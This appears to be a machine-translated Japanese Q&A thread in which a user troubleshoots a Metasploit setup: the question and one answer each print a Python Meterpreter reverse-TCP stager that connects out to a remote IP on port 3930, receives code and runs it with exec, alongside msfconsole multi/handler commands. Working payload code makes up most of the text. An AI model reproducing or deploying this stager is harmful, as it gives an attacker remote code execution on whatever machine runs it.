0

私はmsfvenom次のpythonペイロードを作成するために使用しました:

import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})

次に、 を開きmsfconsole、次のことを行いました。

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit

192.168.0.186:3930 でリバース TCP ハンドラーを開始し、ペイロード ハンドラーも開始します。しかし、別のコンピューターでスクリプトを実行すると、約 1 分待ってからペイロードがタイムアウトし、msfconsole は何も登録しません。ルーターで 3930 にポート転送しました。ここで何が間違っていますか?

4

1 に答える 1

0

これは、Unix システムでリバース TCP に使用するコードと、提供された詳細です。ただし、エラー検索の後にあなたの投稿に出くわしたので、これは 100% 完璧ではありません. 過去には完全に動作するようになりましたが、最近遅くなり始めました。内部システムで 1 回実行されますが、その後は同じエラー メッセージが表示されます。LAN ではなく WAN 経由でこれを行った場合にも同じメッセージが表示されますが、最初は実行されません。どの ISP を使用していますか? それに完全に依存している可能性があります。

import socket,struct
s=socket.socket(2,1)
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
于 2016-09-26T03:58:39.813 に答える